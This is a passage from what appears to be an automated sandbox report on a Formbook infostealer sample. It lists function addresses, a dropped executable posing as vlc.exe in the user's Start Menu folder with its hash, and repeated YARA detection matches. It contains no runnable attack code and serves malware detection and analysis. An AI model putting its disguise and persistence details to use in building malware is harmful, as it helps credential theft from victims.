          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041CFA3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FF900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01414120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140C1C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01412990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014199BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1002
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014CE824
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C28EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140B090
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C20A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01413360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D337D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B231B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C2B28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B03DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BDBD2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142ABD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A23E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01448BE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D3382
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0149EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142EBB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014AFA2B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D225E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BE2C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C22AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C32A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01412D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C1D55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F0D20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C2D07
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C25DD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140D5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014265A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BD466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140841F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01412430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D94B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424CD4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014CDFCE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B67E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C1FF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0147AE60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BD616
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01416E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C2EF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A1EB6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_014FC134
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_014FE568
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_014FE578
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_0715C5B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_0715BCE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_0715E050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_0715B9A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_07550680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_0755BCB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_07555B50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_07550408
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_075503FA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_07555B80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041D96D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041DAB1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041DCBF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00402D88
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00409E40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00409E3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041DF98
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041CFA3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017B4120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0179F900
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017B99BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_018620A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017BA830
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_018628EC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01851002
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0186E824
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017C20A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017AB090
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017BAB40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0185DBD2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_018503DA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01862B28
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017CEBB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_018622AE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0184FA2B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01790D20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_018625DD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01862D07
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017AD5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01861D55
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017C2581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017A841F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0185D466
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0186DFCE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01861FF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017B6E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_01862EF7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0185D616
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: String function: 01485720 appears 81 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: String function: 0144D08C appears 45 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: String function: 013FB150 appears 147 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: String function: 0179B150 appears 66 times
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000000.333901208.0000000000F68000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCxnjmhojuh1.exe, vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCczlacnnghvxx.dll4 vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary3.dll< vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000001.00000002.361822544.0000000000978000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCxnjmhojuh1.exe, vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000001.00000002.362491905.000000000167F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeBinary or memory string: OriginalFilenameCxnjmhojuh1.exe, vs SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
